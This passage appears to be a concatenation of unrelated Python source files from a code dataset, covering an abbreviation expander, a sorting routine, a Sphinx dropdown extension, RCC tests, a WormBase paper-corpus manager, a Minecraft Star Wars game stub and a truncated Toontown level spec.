("net wt", "net weight"),
#("[Nn]ov", "november"),
#("no", "number"),
#("occupn", "occupation"),
#("[Oo]ct", "october"),
("[Oo]rg", "organisation"),
("PM", "prime minister"), #conflict with pm in time expressions
#("pm", "post meridiem"),
#("PM", "post meridiem"),
("[Pp]res", "president"),
("Prof", "professor"),
("[Pp]vt", "private"),
("[Qq]uot", "quotation"),
("[Rr]egd", "registered"),
("[Rr]egds", "regards"),
#("sched", "schedule"),
("sec", "section"),
#("[Ss]ept", "september"),
("smth", "something"),
("Sqn Ldr", "squadron leader"),
("Sr", "senior"),
("St", "saint"),
("st", "street"),
("tbsp", "tablespoon"),
("[Tt]el", "telephone"),
("tsp", "teaspoon"),
("UK", "United Kingdom"),
("unabr", "unabridged"),
("unk", "unknown"),
("US", "United States"),
("vol", "volume"),
("vols", "volumes"),
("[Vv]s", "versus"),
#("viz", "namely"),
("wt", "weight"),
("WWI", "world war one"),
("WWII", "world war two"),
("WWIII", "world war three"),
("WW1", "world war one"),
("WW2", "world war two"),
("WW3", "world war three"),
("[Xx]mas", "christmas"),
#("N", "North"),
#("E", "East"),
#("W", "West"),
#("S", "South"),
("@", " at"),
("#", "hashtag"),
("&", " and"),
("\+", " plus"),
("\=", " is equal to"),
("\*", " times"),
]]
class AbbreviationConverter:
def __init__(self,lang):
super(AbbreviationConverter,self).__init__()
self.lang = lang
def transform(self,text):
text = self.convert_abbreviations(text)
return text
def convert_abbreviations(self,text):
for regex, replacement in ABBREVIATIONS_COMMON:
try:
text = re.sub(regex, replacement, text)
            except Exception:
                print('Abbreviation conversion failed')
return text
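# Example usage (added for illustration, not part of the original module).
if __name__ == '__main__':
    converter = AbbreviationConverter('en')
    print(converter.transform("Dr Smith joined the dept as an asst manager."))
    # expands Dr/dept/asst to doctor/department/assistant (each replacement
    # also appends a space, so the output may contain double spaces)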
|
python
|
def insertionSort(arr):
for x in range(1, len(arr)):
item = arr[x]
i = x - 1
while i >= 0 and item < arr[i]:
arr[i + 1] = arr[i]
i -= 1
arr[i + 1] = item
return arr
print(insertionSort([1,9,8,4,6,7,3,12,5,18,2,22]))
|
python
|
"""Originally Adapted from sphinxcontrib.details.directive
"""
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx.util.docutils import SphinxDirective
from sphinx.transforms.post_transforms import SphinxPostTransform
from sphinx.util.nodes import NodeMatcher
def setup_dropdown(app):
app.add_node(dropdown_main, html=(visit_dropdown_main, depart_dropdown_main))
app.add_node(dropdown_title, html=(visit_dropdown_title, depart_dropdown_title))
app.add_directive("dropdown", DropdownDirective)
app.add_post_transform(DropdownHtmlTransform)
class dropdown_main(nodes.Element, nodes.General):
pass
class dropdown_title(nodes.TextElement, nodes.General):
pass
def visit_dropdown_main(self, node):
if node.get("opened"):
self.body.append(self.starttag(node, "details", open="open"))
else:
self.body.append(self.starttag(node, "details"))
def depart_dropdown_main(self, node):
self.body.append("</details>")
def visit_dropdown_title(self, node):
self.body.append(self.starttag(node, "summary"))
def depart_dropdown_title(self, node):
self.body.append("</summary>")
class DropdownDirective(SphinxDirective):
optional_arguments = 1
final_argument_whitespace = True
has_content = True
option_spec = {
"container": directives.unchanged,
"title": directives.unchanged,
"body": directives.unchanged,
"open": directives.flag,
"marker-color": directives.unchanged,
"name": directives.unchanged,
"animate": lambda a: directives.choice(a, ("fade-in", "fade-in-slide-down")),
}
def run(self):
# default classes
classes = {
"container_classes": ["mb-3"],
"title_classes": [],
"body_classes": [],
}
# add classes from options
for element in ["container", "title", "body"]:
if element not in self.options:
continue
value = self.options.get(element).strip()
if value.startswith("+"):
classes.setdefault(element + "_classes", []).extend(value[1:].split())
else:
classes[element + "_classes"] = value.split()
# add animation classes
if (
"animate" in self.options
and self.options["animate"] not in classes["container_classes"]
):
classes["container_classes"].append(self.options["animate"])
container = nodes.container(
"",
marker_color=self.options.get("marker-color", "currentColor"),
opened="open" in self.options,
type="dropdown",
has_title=len(self.arguments) > 0,
**classes
)
if self.arguments:
textnodes, messages = self.state.inline_text(self.arguments[0], self.lineno)
container += nodes.paragraph(self.arguments[0], "", *textnodes)
container += messages
self.state.nested_parse(self.content, self.content_offset, container)
self.add_name(container)
return [container]
CHEVRON = """\
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
viewBox="0 0 24 24" fill="none"
stroke="{color}" stroke-width="2"stroke-linecap="round" stroke-linejoin="round"
>
<polyline points="{points}"></polyline>
</svg>"""
ELLIPSIS = """\
<svg viewBox="0 0 36 24" width="36" height="16" xmlns="http://www.w3.org/2000/svg"
data-icon="ui-components:ellipses" class="ellipsis">
<g xmlns="http://www.w3.org/2000/svg" class="jp-icon3" fill="currentColor">
<circle cx="0" cy="12" r="6"></circle>
<circle cx="18" cy="12" r="6"></circle>
<circle cx="36" cy="12" r="6"></circle>
</g>
</svg>"""
class DropdownHtmlTransform(SphinxPostTransform):
default_priority = 200
builders = ("html", "dirhtml", "singlehtml", "readthedocs")
def run(self):
matcher = NodeMatcher(nodes.container, type="dropdown")
for node in self.document.traverse(matcher):
open_marker = nodes.container(
"",
nodes.raw(
"",
nodes.Text(
CHEVRON.format(
color=node["marker_color"], points="18 15 12 9 6 15"
)
),
format="html",
),
is_div=True,
classes=["summary-chevron-down"],
)
closed_marker = nodes.container(
"",
nodes.raw(
"",
nodes.Text(
CHEVRON.format(
color=node["marker_color"], points="6 9 12 15 18 9"
)
),
format="html",
),
is_div=True,
classes=["summary-chevron-up"],
)
newnode = dropdown_main(
opened=node["opened"],
classes=["sphinx-bs", "dropdown", "card"] + node["container_classes"],
)
if node["has_title"]:
title_children = node[0]
body_children = node[1:]
else:
title_children = [nodes.raw("...", nodes.Text(ELLIPSIS), format="html")]
body_children = node
newnode += dropdown_title(
"",
"",
*title_children,
closed_marker,
open_marker,
classes=["summary-title", "card-header"] + node["title_classes"]
)
body_node = nodes.container(
"",
*body_children,
is_div=True,
classes=["summary-content", "card-body"] + node["body_classes"]
)
for para in body_node.traverse(nodes.paragraph):
para["classes"] = ([] if "classes" in para else para["classes"]) + [
"card-text"
]
newnode += body_node
# newnode += open_marker
node.replace_self(newnode)
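# Usage sketch (added for illustration; the import path below is an assumption
# and should match wherever this module lives in your project):
#
#   # in a Sphinx extension module or conf.py
#   def setup(app):
#       setup_dropdown(app)
#
#   # and in an .rst source file
#   .. dropdown:: Show the answer
#      :animate: fade-in
#
#      This body stays hidden until the summary is clicked.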
|
python
|
from robocorp_code.protocols import IRcc, IRccRobotMetadata
import py.path
def test_rcc_template_names(rcc: IRcc):
result = rcc.get_template_names()
assert result.success
assert result.result
assert "standard" in result.result
def test_rcc_cloud(rcc: IRcc, ci_credentials: str, tmpdir: py.path.local):
assert not rcc.credentials_valid()
result = rcc.add_credentials(ci_credentials)
assert result.success
assert rcc.credentials_valid()
result = rcc.cloud_list_workspaces()
assert result.success
workspaces = result.result
if not workspaces:
raise AssertionError("Expected to have CI Workspace available.")
workspaces = [ws for ws in workspaces if ws.workspace_name == "CI workspace"]
if not workspaces:
raise AssertionError("Expected to have CI Workspace available.")
ws = workspaces[0]
result = rcc.cloud_list_workspace_robots(ws.workspace_id)
assert result.success
lst = result.result
if lst is None:
raise AssertionError("Found no workspace")
acts = [act for act in lst if act.robot_name == "CI activity"]
if not acts:
result = rcc.cloud_create_robot(ws.workspace_id, "CI activity")
assert result.success
result = rcc.cloud_list_workspace_robots(ws.workspace_id)
assert result.success
lst = result.result
if lst is None:
raise AssertionError("Found no activity")
acts = [act for act in lst if act.robot_name == "CI activity"]
if not acts:
raise AssertionError(
"Expected to be able to create CI activity (or have it there already)."
)
act: IRccRobotMetadata = acts[0]
wsdir = str(tmpdir.join("ws"))
result = rcc.create_robot("standard", wsdir)
assert result.success
result = rcc.cloud_set_robot_contents(wsdir, ws.workspace_id, act.robot_id)
assert result.success
def test_rcc_run_with_conda_yaml(rcc: IRcc, rcc_conda_installed):
python_code = """
import sys
sys.stdout.write('It worked')
"""
conda_yaml_str_contents = """
channels:
- defaults
- conda-forge
dependencies:
- python=3.7.5
"""
result = rcc.run_python_code_robot_yaml(python_code, conda_yaml_str_contents)
assert result.success
assert result.result
# Note: even in silent mode we may have additional output!
assert "It worked" in result.result
def test_numbered_dir(tmpdir):
from robocorp_code.rcc import make_numbered_in_temp
from pathlib import Path
import time
registered = []
from functools import partial
def register(func, *args, **kwargs):
registered.append(partial(func, *args, **kwargs))
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
# Sleep so that it'll be scheduled for removal at the next creation.
time.sleep(0.02)
assert n.name.endswith("-0")
assert n.is_dir()
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
assert n.name.endswith("-1")
assert n.is_dir()
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
assert n.name.endswith("-2")
assert n.is_dir()
# Removed dir 0.
assert len(list(n.parent.iterdir())) == 3
for r in registered:
r()
assert len(list(n.parent.iterdir())) == 2
|
python
|
# Definition for a binary tree node.
class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None
class Solution(object):
lookup = {1:[TreeNode(0)]}
def allPossibleFBT(self, N):
if N%2 == 0:
return None
if N not in Solution.lookup:
ans = []
for x in range(1,N,2):
y = N - 1 -x
for left in self.allPossibleFBT(x):
for right in self.allPossibleFBT(y):
root = TreeNode(0)
root.left = left
root.right = right
ans.append(root)
Solution.lookup[N] = ans
return Solution.lookup[N]
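# Small demo (added for illustration): there are 5 distinct full binary trees
# with 7 nodes (the Catalan number C(3)).
if __name__ == '__main__':
    print(len(Solution().allPossibleFBT(7)))  # 5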
|
python
|
import unittest
from preset import ActionTypes, Step, Preset
class TestStep(unittest.TestCase):
def test_01_constructor_and_properties(self):
temp_name = "name"
temp_value = "value"
temp_executable = lambda x: x
temp_action_type = ActionTypes.filter
temp_instance = Step(temp_name, temp_value, temp_executable, temp_action_type)
self.assertEqual(temp_name, temp_instance.name)
self.assertEqual(temp_value, temp_instance.value)
self.assertEqual(temp_executable, temp_instance.executable)
self.assertEqual(temp_action_type, temp_instance.action_type)
class TestPreset(unittest.TestCase):
def test_01_constructor_and_properties(self):
temp_names = ["name1", "name2", "name3"]
temp_values = ["value1", "value2", "value3"]
temp_executables = [lambda x: x, lambda y: y + 2, lambda z: z + 3]
temp_action_types = [ActionTypes.filter, ActionTypes.enhanceAction, ActionTypes.custom]
steps = [Step(temp_names[i], temp_values[i], temp_executables[i], temp_action_types[i]) for i in range(len(temp_names))]
instance_name = "foo"
instance_description = "description"
temp_instance = Preset(instance_name, instance_description, steps)
self.assertEqual(instance_name, temp_instance.name)
self.assertEqual(instance_description, temp_instance.description)
for i, step in enumerate(temp_instance.steps):
self.assertEqual(steps[i], step)
if __name__ == '__main__':
unittest.main()
|
python
|
import logging
import os
import pickle
from typing import Generator, List, Tuple, Dict
from gensim.models import Word2Vec
from gensim.test.utils import common_texts
from wbtools.db.dbmanager import WBDBManager
from wbtools.lib.nlp.common import PaperSections
from wbtools.lib.nlp.text_preprocessing import preprocess
from wbtools.lib.nlp.text_similarity import get_softcosine_index, get_similar_documents, SimilarityResult
from wbtools.literature.paper import WBPaper
logger = logging.getLogger(__name__)
class CorpusManager(object):
"""manage a list of WBPaper objects by populating their data from database or local directory"""
def __init__(self):
self.corpus = {}
def add_or_update_wb_paper(self, wb_paper: WBPaper):
"""add a paper
Args:
wb_paper(WBPaper): the paper to add to the corpus
"""
self.corpus[wb_paper.paper_id] = wb_paper
def remove_wb_paper(self, wb_paper: WBPaper):
"""remove a paper
Args:
wb_paper(WBPaper): the paper to remove from the corpus
"""
del self.corpus[wb_paper.paper_id]
def load_from_dir_with_txt_files(self, dir_path: str):
"""
load papers from a directory containing text files with file name in the following format:
<WBPaperID>_<Author><Year>_<additional_options>.txt
Only files with .txt extension are loaded. Paper ID is derived from the file name and additional options are
used to understand the type of file (e.g., main article, ocr scanned article, supplementary material etc.)
Args:
dir_path (str): path to the input directory containing text files
"""
        paper = WBPaper()
        for f in sorted(os.listdir(dir_path)):
            if os.path.isfile(os.path.join(dir_path, f)) and f.endswith(".txt"):
                if paper.paper_id and not paper.has_same_wbpaper_id_as_filename(f):
                    self.add_or_update_wb_paper(paper)
                    paper = WBPaper()
                paper.add_file(dir_path=dir_path, filename=f, remote_file=False, pdf=False)
        # make sure the last paper read from the directory is also added to the corpus
        if paper.paper_id:
            self.add_or_update_wb_paper(paper)
def load_from_wb_database(self, db_name: str, db_user: str, db_password: str, db_host: str,
ssh_host: str = 'tazendra.caltech.edu', ssh_user: str = None, ssh_passwd: str = None,
paper_ids: list = None,
from_date: str = None, load_pdf_files: bool = True, load_bib_info: bool = True,
load_curation_info: bool = True, load_afp_info: bool = False, max_num_papers: int = None,
exclude_ids: List[str] = None, must_be_autclass_flagged: bool = False,
exclude_temp_pdf: bool = False, exclude_pap_types: List[str] = None,
pap_types: List[str] = None,
exclude_afp_processed: bool = False, exclude_afp_not_curatable: bool = False,
exclude_no_main_text: bool = False, exclude_no_author_email: bool = False) -> None:
"""load papers from WormBase database
Args:
db_name (str): database name
db_user (str): database user
db_password (str): database password
db_host (str): database host
ssh_host (str): host where to fetch the files via ssh
ssh_user (str): ssh user to fetch pdf files
ssh_passwd (str): ssh password to fetch pdf files
paper_ids (list): optional list of paper ids to be fetched
from_date (str): load papers added or modified from the specified date (only if paper_ids is not provided)
load_pdf_files (bool): load pdf files using ssh credentials
load_bib_info (bool): load bibliographic info of the papers
load_curation_info (bool): load curation info of the papers
load_afp_info (bool): load author first pass info of the papers
max_num_papers (int): limit number of papers to be loaded
exclude_ids (List[str]): list of paper ids to exclude
must_be_autclass_flagged (bool): whether to exclude papers that have not been flagged by WB classifiers
exclude_temp_pdf (bool): whether to exclude papers with temp pdfs only
exclude_pap_types (List[str]): list of pap_types (string value, not numeric) to exclude
            pap_types (List[str]): list of paper types to load
            exclude_afp_processed (bool): whether to exclude papers already processed by the author first pass system
exclude_afp_not_curatable (bool): whether to exclude papers that are not relevant for AFP curation
exclude_no_main_text (bool): whether to exclude papers without a fulltext that can be converted to txt
exclude_no_author_email (bool): whether to exclude papers without any contact email in WB
"""
main_db_manager = WBDBManager(db_name, db_user, db_password, db_host)
with main_db_manager:
if not paper_ids:
paper_ids = main_db_manager.generic.get_all_paper_ids(added_or_modified_after=from_date,
exclude_ids=exclude_ids)
if pap_types:
ids_to_include = set(main_db_manager.generic.get_paper_ids_with_pap_types(pap_types))
paper_ids = [paper_id for paper_id in paper_ids if paper_id in ids_to_include]
if exclude_pap_types:
ids_to_exclude = set(main_db_manager.generic.get_paper_ids_with_pap_types(exclude_pap_types))
paper_ids = [paper_id for paper_id in paper_ids if paper_id not in ids_to_exclude]
if load_afp_info or exclude_afp_processed:
afp_no_submission_ids = main_db_manager.afp.get_paper_ids_afp_no_submission()
afp_full_submission_ids = main_db_manager.afp.get_paper_ids_afp_full_submission()
afp_partial_submission_ids = main_db_manager.afp.get_paper_ids_afp_partial_submission()
else:
afp_no_submission_ids = []
afp_full_submission_ids = []
afp_partial_submission_ids = []
afp_processed_ids = set(afp_no_submission_ids) | set(afp_partial_submission_ids) | set(afp_full_submission_ids)
afp_curatable = set(main_db_manager.afp.get_afp_curatable_paper_ids() if exclude_afp_not_curatable else [])
blacklisted_email_addresses = main_db_manager.generic.get_blacklisted_email_addresses() if \
exclude_no_author_email else []
for paper_id in paper_ids:
paper = WBPaper(paper_id=paper_id, ssh_host=ssh_host, ssh_user=ssh_user,
ssh_passwd=ssh_passwd, db_manager=main_db_manager.paper)
if exclude_afp_processed and paper_id in afp_processed_ids:
logger.info("Skipping paper already processed by AFP")
continue
if exclude_afp_not_curatable and paper_id not in afp_curatable:
logger.info("Skipping paper not AFP curatable")
continue
if load_pdf_files:
logger.info("Loading text from PDF files for paper")
paper.load_text_from_pdf_files_in_db()
if exclude_temp_pdf and paper.is_temp():
logger.info("Skipping proof paper")
continue
if exclude_no_main_text and not paper.has_main_text():
logger.info("Skipping paper without main text")
continue
# functions with db access
with paper.db_manager:
if load_curation_info:
logger.info("Loading curation info for paper")
paper.load_curation_info_from_db()
if must_be_autclass_flagged and not paper.aut_class_values:
logger.info("Skipping paper without automated classification")
continue
if load_bib_info:
logger.info("Loading bib info for paper")
paper.load_bib_info_from_db()
if exclude_no_author_email and not paper.get_authors_with_email_address_in_wb(
blacklisted_email_addresses=blacklisted_email_addresses):
logger.info("Skipping paper without any email address in text with records in WB")
continue
if load_afp_info:
logger.info("Loading AFP info for paper")
paper.load_afp_info_from_db(paper_ids_no_submission=afp_no_submission_ids,
paper_ids_full_submission=afp_full_submission_ids,
paper_ids_partial_submission=afp_partial_submission_ids)
self.add_or_update_wb_paper(paper)
logger.info("Paper " + paper_id + " added to corpus. Corpus size: " + str(self.size()))
if max_num_papers and self.size() >= max_num_papers:
break
def size(self) -> int:
"""number of papers in the corpus manager
Returns:
int: the number of papers
"""
return len(self.corpus)
def get_flat_corpus_list_and_idx_paperid_map(self, split_sentences: bool = False,
remove_sections: List[PaperSections] = None,
must_be_present: List[PaperSections] = None,
lowercase: bool = False, tokenize: bool = False,
remove_stopwords: bool = False,
remove_alpha: bool = False) -> Tuple[List[str], Dict[int, str]]:
"""get a flat list of text documents from the papers in the corpus and a map to link the index in the resulting
list and the id of the related paper
Args:
split_sentences (bool): split sentences into separate documents
remove_sections (List[PaperSections]): list of sections to remove
must_be_present (List[PaperSections]): list of sections that must be present
lowercase (bool): transform text to lowercase
tokenize (bool): tokenize text into words
remove_stopwords (bool): remove common stopwords from text
remove_alpha (bool): remove special characters and punctuation from text
Returns:
Tuple[List[str], Dict[int, str]]: the flat list and the related index to paper id map
"""
flat_list_with_ids = [(doc, paper.paper_id) for paper in self.corpus.values() for doc in paper.get_text_docs(
include_supplemental=True, remove_sections=remove_sections, must_be_present=must_be_present,
split_sentences=split_sentences, lowercase=lowercase, tokenize=tokenize, remove_stopwords=remove_stopwords,
remove_alpha=remove_alpha)]
return [d[0] for d in flat_list_with_ids], {idx: d[1] for idx, d in enumerate(flat_list_with_ids)}
def get_paper(self, paper_id) -> WBPaper:
"""get a paper from the corpus by paper id
Args:
paper_id (str): paper id to retrieve
Returns:
WBPaper: the paper
"""
return self.corpus[paper_id]
def get_all_papers(self) -> Generator[WBPaper, None, None]:
"""get all the papers in the corpus
Returns:
Generator[WBPaper, None, None]: a generator to the papers in the corpus
"""
for paper in self.corpus.values():
yield paper
def save(self, file_path: str) -> None:
"""save corpus to file
Args:
file_path (str): path to file to save
"""
with open(file_path, 'wb') as out_file:
pickle.dump(self, out_file)
def load(self, file_path: str) -> None:
"""load corpus from previously saved file
Args:
file_path (str): path to file to load
"""
with open(file_path, 'rb') as in_file:
tmp_self = pickle.load(in_file)
self.__dict__ = tmp_self.__dict__
def query_papers_by_doc_similarity(self, query_docs: List[str], sentence_search: bool = False,
remove_sections: List[PaperSections] = None,
must_be_present: List[PaperSections] = None, path_to_model: str = None,
average_match: bool = True, num_best: int = 10) -> List[SimilarityResult]:
"""query papers in the corpus by similarity with the provided query documents, which can be fulltext documents
or sentences
Args:
query_docs (List[str]): list of query documents
sentence_search (bool): perform sentence level similarity search
remove_sections (List[PaperSections]): sections to be ignored from corpus papers
must_be_present (List[PaperSections]): sections that must be present in corpus papers before removing
sections
path_to_model (str): path to word2vec model
average_match (bool): merge query documents and calculate average similarity to them
num_best (int): limit to the first n results by similarity score
Returns:
List[SimilarityResult]: list of papers most similar to the provided query documents
"""
model = Word2Vec(common_texts, min_count=1) if not path_to_model else None
corpus_list_token, idx_paperid_map = self.get_flat_corpus_list_and_idx_paperid_map(
split_sentences=sentence_search, remove_sections=remove_sections, must_be_present=must_be_present,
lowercase=True, tokenize=True, remove_stopwords=True, remove_alpha=True)
corpus_list_token_orig, _ = self.get_flat_corpus_list_and_idx_paperid_map(
split_sentences=sentence_search, remove_sections=remove_sections, must_be_present=must_be_present,
lowercase=False, tokenize=False, remove_stopwords=False, remove_alpha=False)
docsim_index, dictionary = get_softcosine_index(model=model, model_path=path_to_model,
corpus_list_token=corpus_list_token, num_best=num_best)
query_docs_preprocessed = [preprocess(doc=sentence, lower=True, tokenize=True, remove_stopwords=True,
remove_alpha=True) for sentence in query_docs]
sims = get_similar_documents(docsim_index, dictionary, query_docs_preprocessed, idx_paperid_map,
average_match=average_match)
results = [SimilarityResult(score=sim.score, paper_id=sim.paper_id, match_idx=sim.match_idx,
query_idx=sim.query_idx, match="\"" + corpus_list_token_orig[sim.match_idx] + "\"",
query="\"" + (" ".join(query_docs) if average_match else query_docs[sim.query_idx]
) + "\"") for sim in sims]
return results[0:num_best] if len(results) > num_best else results
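# Usage sketch (added for illustration; the directory path and query are
# placeholders, and loading from the WormBase database instead would require
# valid DB/SSH credentials):
if __name__ == '__main__':
    corpus_manager = CorpusManager()
    corpus_manager.load_from_dir_with_txt_files(dir_path="/path/to/txt_files")
    print(f"Loaded {corpus_manager.size()} papers")
    results = corpus_manager.query_papers_by_doc_similarity(
        query_docs=["mutant phenotype analysis"],
        sentence_search=True,
        num_best=5,
    )
    for res in results:
        print(res.paper_id, res.score)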
|
python
|
# game.py (c) 2017 D.J.Whale 22/01/2017
# Star-Wars 'Use the Force, Luke' game
# Using many moving parts provided by Martin O'Hanlon
#----- CONFIGURATION ----------------------------------------------------------
DEATHSTAR_CENTRE_POS = (100,100,10)
TARGET_POS = (100,100,10)
IN_RANGE = ((100,100,10), (100,100,10))
XWING_START_POS = (46,10,-61)
PLAY_TIME_SECS = 5 #(2*60)
NUMBER_OF_TRIES = 3
FRAMES_PER_SEC = 10
#TODO: Mart's code animates the trench separately from deathstar
#so do we need to switch over to that animation at the right position?
#also is there a visual clue to where the trench is, in the deathstar model?
#TODO: xwing can turn or shift
#might make it turn if you tilt it left or right a long way
#in which case we need l,L and r,R for two ranges of left and right tilt
#----- LOAD ALL THE DEPENDENT PARTS -------------------------------------------
import sys
if sys.version_info[0] != 2:
print("Please run this game with Python version 2")
sys.exit()
import time
import controller # auto-connects to the controller
import starwars # auto-connects to Minecraft
#----- GAME STATE -------------------------------------------------------------
deathstar = None
xwing = None
missile = None
xwing_crashed = False
missile_missed = False
missile_hit = False
game_stop_time = 0
#----- BUILD THE GAME WORLD ---------------------------------------------------
def clear_space():
print("will clear_space")
#TODO:
def build_deathstar():
print("will build_deathstar")
#TODO: build at DEATHSTAR_CENTRE_POS
def create_xwing():
global xwing
if xwing is not None:
# kill off old x-wing
xwing.clear()
xwing = None
xwing = starwars.MCObject(starwars.XWING_BLOCKS, XWING_START_POS)
xwing.draw()
def setup_game():
clear_space()
build_deathstar()
create_xwing()
clear_flags()
def wait_for_start():
print("will wait_for_start")
raw_input("press RETURN to start")
#TODO: wait for A button press on micro:bit
#loop, read from micro:bit, until see 'A'
#----- GAME ACTIONS -----------------------------------------------------------
def fly_xwing():
buttons = controller.get_command_flags()
if buttons is not None:
up = 'U' in buttons
down = 'D' in buttons
left = 'L' in buttons
right = 'R' in buttons
fire = 'A' in buttons
eject = 'B' in buttons
# change xwing position based on u/d/l/r
if left:
xwing.rotate_by(yaw=-10)
print("left")
if right:
xwing.rotate_by(yaw=+10)
print("right")
if up:
xwing.move_by(y=+1)
print("up")
if down:
xwing.move_by(y=-1)
print("down")
if fire: print("boom!!")
if eject: print("yeehar!!")
# always move xwing forward by one block
xwing.fly()
# if xwing crashes into any block
# set_xwing_crashed()
#if fire: start_missile()
#if eject: ejector_seat()
def start_missile():
print("will start_missile")
#TODO:
# create missile object in front of xwing
# note we need to know what direction the xwing is flying in
# we also need to know a range of positions to succeed from
def move_missile():
print("will move_missile")
#TODO:
# if missile now out of range:
# set_missile_missed()
# elif missile not yet hit target:
# move missile forward by 1
# else must have hit
# set_missile_hit()
def ejector_seat():
print("will ejector_seat")
animate_eject()
animate_xwing_crashed()
set_xwing_crashed()
#------ GAME CONDITIONS -------------------------------------------------------
#
# Set various game conditions in the game state.
# The main loop will detect and action these appropriately.
# This prevents passing lots of variables around,
# but contains the global variables a bit more into a controlled space (here)
def clear_flags():
global xwing_crashed, missile_missed, missile_hit
xwing_crashed = False
missile_missed = False
missile_hit = False
def set_xwing_crashed():
global xwing_crashed
xwing_crashed = True
def set_missile_missed():
global missile_missed
missile_missed = True
def set_missile_hit():
global missile_hit
missile_hit = True
#----- ANIMATIONS -------------------------------------------------------------
def animate_missile_missed():
print("will animate_missile_missed")
#TODO:
def animate_missile_hit():
print("will animate_missile_hit")
#TODO:
def animate_eject():
print("will animate_eject")
#TODO:
def animate_xwing_crashed():
    print("will animate_xwing_crashed")
    #TODO:
def animate_blow_up_deathstar():
    print("will animate_blow_up_deathstar")
#TODO:
# auto pilot the ship to a safe location
# animate the deathstar blowing up
# return when deathstar gone
#----- SPLASH SCREENS ---------------------------------------------------------
def splash_screen():
print("will splash_screen")
#TODO:
def game_over_failed():
print("will game_over_failed")
#TODO:
def game_over_succeeded():
print("will game_over_succeeded")
#TODO:
#----- GAME LOOP --------------------------------------------------------------
def start_game():
global game_stop_time
print("will start_game")
#TODO: move player to position on start (hides splash screen)
game_stop_time = time.time() + PLAY_TIME_SECS
def run_out_of_time():
return time.time() >= game_stop_time
def play_game():
missiles_left = NUMBER_OF_TRIES
while not run_out_of_time() and not xwing_crashed and not missile_hit and missiles_left > 0:
time.sleep(1/float(FRAMES_PER_SEC))
fly_xwing()
if missile is not None:
move_missile()
if missile_missed:
animate_missile_missed()
missiles_left -= 1
elif missile_hit:
animate_missile_hit()
animate_blow_up_deathstar()
return missile_hit
def whereami():
import starwars.mcpi.minecraft as minecraft
mc = minecraft.Minecraft.create()
x,y,z = mc.player.getTilePos()
print(x,y,z)
#----- MAIN PROGRAM -----------------------------------------------------------
#if __name__ == "__main__":
# while True:
# setup_game()
# splash_screen()
# wait_for_start()
# start_game()
#
# success = play_game()
#
# if success:
# game_over_succeeded()
# else:
# game_over_failed()
#whereami()
create_xwing()
while True:
print("fly")
fly_xwing()
time.sleep(0.1)
# END
|
python
|
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr', 'name': 'LevelMgr', 'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_11/models/lawbotHQ/LB_Zone7a',
'wantDoors': 1},
1001: {'type': 'editMgr', 'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone', 'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
10013: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(57.0219, 5.15024, 0),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(0.660517, 0.660517, 0.660517),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_C.bam'},
10015: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(-25.74, 58.3575, 9.73551),
'hpr': Vec3(95.4403, 0, 0),
'scale': Vec3(1.5379, 1.5379, 1.5379),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
10016: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(33.3395, -18.3643, 0),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(0.66, 0.66, 0.66),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D1.bam'},
10017: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 10018,
'pos': Point3(0, 0, 0),
'hpr': Point3(169.7, 0, 0),
'scale': Vec3(0.90247, 0.90247, 0.90247),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D4.bam'},
10020: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 10018,
'pos': Point3(-12.0714, 0, 0),
'hpr': Vec3(288.435, 0, 0),
'scale': Vec3(0.90247, 0.90247, 0.90247),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D4.bam'},
10022: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10021,
'pos': Point3(-5.97179, -60.3134, 0),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(0.869391, 0.869391, 0.869391),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_C.bam'},
100015: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-1.31696, 0, 0.1),
'hpr': Vec3(0, 0, 0),
'scale': Point3(1.6, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100016: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-12.7478, -11.9991, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_couchA'},
100017: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-17.0503, 0, 0.1),
'hpr': Vec3(0, 0, 0),
